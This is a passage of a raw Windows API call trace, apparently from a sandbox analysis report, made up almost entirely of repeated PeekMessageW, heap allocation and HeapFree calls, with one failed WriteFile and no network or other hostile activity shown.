(in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.530] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.530] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.530] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.530] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.530] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.530] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.530] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.530] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.530] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.531] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.531] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.531] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.531] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.531] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.531] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.531] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.531] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.531] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.531] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.531] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.531] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.531] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.531] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.531] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.531] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.531] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.531] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.531] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.531] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.531] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.531] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.531] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.532] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.532] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.532] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.532] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.532] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.532] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.532] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.532] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.532] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.532] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.532] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.532] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.532] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.532] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.532] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.532] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.532] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.532] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc3d5e0 | out: hHeap=0xbc0000) returned 1 [0257.532] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.532] GetLastError () returned 0x6 [0257.533] SetLastError (dwErrCode=0x6) [0257.533] GetLastError () returned 0x6 [0257.533] SetLastError (dwErrCode=0x6) [0257.533] WriteFile (in: hFile=0xfffffffe, lpBuffer=0xc04290, nNumberOfBytesToWrite=0x22, lpNumberOfBytesWritten=0x7de0c8, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x7de0c8, lpOverlapped=0x0) returned 0 [0257.533] GetLastError () returned 0x6 [0257.533] GetLastError () returned 0x6 [0257.533] SetLastError (dwErrCode=0x6) [0257.533] GetLastError () returned 0x6 [0257.533] SetLastError (dwErrCode=0x6) [0257.533] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcdf350 | out: hHeap=0xbc0000) returned 1 [0257.533] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01b58 | out: hHeap=0xbc0000) returned 1 [0257.533] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc052b0 | out: hHeap=0xbc0000) returned 1 [0257.533] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01948 | out: hHeap=0xbc0000) returned 1 [0257.533] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcd9be0 | out: hHeap=0xbc0000) returned 1 [0257.533] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcd9af0 | out: hHeap=0xbc0000) returned 1 [0257.533] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xbfe050 | out: hHeap=0xbc0000) returned 1 [0257.533] PeekMessageW (in: lpMsg=0x7dfdb4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfdb4) returned 0 [0257.533] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc01948 [0257.533] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc01b58 [0257.533] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x18) returned 0xc2d2f8 [0257.533] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc2d2f8 | out: hHeap=0xbc0000) returned 1 [0257.533] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01b58 | out: hHeap=0xbc0000) returned 1 [0257.533] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01948 | out: hHeap=0xbc0000) returned 1 [0257.533] PeekMessageW (in: lpMsg=0x7dfdb4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfdb4) returned 0 [0257.533] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc01948 [0257.534] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01948 | out: hHeap=0xbc0000) returned 1 [0257.534] PeekMessageW (in: lpMsg=0x7dfdb4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfdb4) returned 0 [0257.534] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc01948 [0257.534] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x20) returned 0xbfe050 [0257.534] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcd9af0 [0257.534] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc01b58 [0257.534] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01b58 | out: hHeap=0xbc0000) returned 1 [0257.534] QueryPerformanceCounter (in: lpPerformanceCount=0x7dfa28 | out: lpPerformanceCount=0x7dfa28*=18802958491) returned 1 [0257.534] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcd9af0 | out: hHeap=0xbc0000) returned 1 [0257.534] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xbfe050 | out: hHeap=0xbc0000) returned 1 [0257.534] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01948 | out: hHeap=0xbc0000) returned 1 [0257.534] PeekMessageW (in: lpMsg=0x7dfdb4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfdb4) returned 0 [0257.534] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x20) returned 0xbfe050 [0257.534] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcd9af0 [0257.534] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc01948 [0257.534] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x4) returned 0xc01b58 [0257.534] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x20) returned 0xbfe190 [0257.534] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0257.534] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xbfe190 | out: hHeap=0xbc0000) returned 1 [0257.534] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01b58 | out: hHeap=0xbc0000) returned 1 [0257.534] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x20) returned 0xbfe190 [0257.534] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x1) returned 0xc01b58 [0257.534] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x20) returned 0xbfe078 [0257.534] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcd9be0 [0257.534] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc01988 [0257.534] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01988 | out: hHeap=0xbc0000) returned 1 [0257.534] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0xc) returned 0xcd9b20 [0257.534] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x20) returned 0xbfe280 [0257.534] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcda678 [0257.534] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x4) returned 0xc01988 [0257.535] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcda690 [0257.535] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x40) returned 0xbfb0d8 [0257.535] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.535] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x20) returned 0xbfe258 [0257.535] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcda648 [0257.535] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x4) returned 0xc01b68 [0257.535] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcda660 [0257.535] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcda6f0 [0257.535] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x20) returned 0xbfe1b8 [0257.535] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcd9b80 [0257.535] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x4) returned 0xc01928 [0257.535] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcd9b50 [0257.535] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcd9b08 [0257.535] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc01878 [0257.535] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcd9b08 | out: hHeap=0xbc0000) returned 1 [0257.535] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcd9b08 [0257.535] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01878 | out: hHeap=0xbc0000) returned 1 [0257.535] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x20) returned 0xbfe1e0 [0257.535] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcd9ad8 [0257.535] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x4) returned 0xc01878 [0257.535] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcd9bf8 [0257.535] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcda600 [0257.535] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x20) returned 0xbfe230 [0257.535] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcda618 [0257.535] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x4) returned 0xc018f8 [0257.535] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcda630 [0257.535] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcda6a8 [0257.535] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x20) returned 0xbfe208 [0257.535] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcd9bc8 [0257.535] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x4) returned 0xc01938 [0257.535] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcd9d48 [0257.535] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcd9ac0 [0257.535] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.535] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.535] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc018c8 [0257.536] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc018c8 | out: hHeap=0xbc0000) returned 1 [0257.536] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcda600 | out: hHeap=0xbc0000) returned 1 [0257.536] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc018c8 [0257.536] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x20) returned 0xbfe2a8 [0257.536] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcda600 [0257.536] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc01b88 [0257.536] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01b88 | out: hHeap=0xbc0000) returned 1 [0257.536] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x4) returned 0xc01b88 [0257.536] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc01968 [0257.536] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01b88 | out: hHeap=0xbc0000) returned 1 [0257.536] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01968 | out: hHeap=0xbc0000) returned 1 [0257.536] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcda600 | out: hHeap=0xbc0000) returned 1 [0257.536] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xbfe2a8 | out: hHeap=0xbc0000) returned 1 [0257.536] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc018c8 | out: hHeap=0xbc0000) returned 1 [0257.536] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x38) returned 0xc3d5e0 [0257.536] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.536] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc018c8 [0257.536] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x20) returned 0xbfe2a8 [0257.536] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcda600 [0257.536] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc01968 [0257.536] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01968 | out: hHeap=0xbc0000) returned 1 [0257.536] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcda6c0 [0257.536] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc01968 [0257.536] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01968 | out: hHeap=0xbc0000) returned 1 [0257.536] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcda6d8 [0257.536] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc01968 [0257.536] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01968 | out: hHeap=0xbc0000) returned 1 [0257.536] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x4) returned 0xc01968 [0257.536] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc01b88 [0257.536] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc01b28 [0257.536] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x1) returned 0xc01b48 [0257.536] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01968 | out: hHeap=0xbc0000) returned 1 [0257.536] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01b88 | out: hHeap=0xbc0000) returned 1 [0257.537] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcda600 | out: hHeap=0xbc0000) returned 1 [0257.537] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcda6c0 | out: hHeap=0xbc0000) returned 1 [0257.537] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcda6d8 | out: hHeap=0xbc0000) returned 1 [0257.537] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xbfe2a8 | out: hHeap=0xbc0000) returned 1 [0257.537] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc018c8 | out: hHeap=0xbc0000) returned 1 [0257.537] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcda6f0 | out: hHeap=0xbc0000) returned 1 [0257.537] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc018c8 [0257.537] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x1) returned 0xc01b88 [0257.537] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01b48 | out: hHeap=0xbc0000) returned 1 [0257.537] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01b28 | out: hHeap=0xbc0000) returned 1 [0257.537] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.537] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc01b28 [0257.537] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01b28 | out: hHeap=0xbc0000) returned 1 [0257.537] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcda6a8 | out: hHeap=0xbc0000) returned 1 [0257.537] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc01b28 [0257.537] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01b28 | out: hHeap=0xbc0000) returned 1 [0257.537] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x38) returned 0xc3d620 [0257.537] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.537] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc01b28 [0257.537] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x20) returned 0xbfe2a8 [0257.537] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcda6a8 [0257.537] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc01b48 [0257.537] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc01968 [0257.537] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x1) returned 0xc01b18 [0257.537] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01b48 | out: hHeap=0xbc0000) returned 1 [0257.537] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcda6f0 [0257.537] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc01b48 [0257.537] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01b48 | out: hHeap=0xbc0000) returned 1 [0257.537] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01b18 | out: hHeap=0xbc0000) returned 1 [0257.537] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01968 | out: hHeap=0xbc0000) returned 1 [0257.537] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcda6a8 | out: hHeap=0xbc0000) returned 1 [0257.537] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcda6f0 | out: hHeap=0xbc0000) returned 1 [0257.537] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xbfe2a8 | out: hHeap=0xbc0000) returned 1 [0257.537] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01b28 | out: hHeap=0xbc0000) returned 1 [0257.538] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcda6f0 [0257.538] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcda6a8 [0257.538] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x4) returned 0xc01b28 [0257.538] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x4) returned 0xc01968 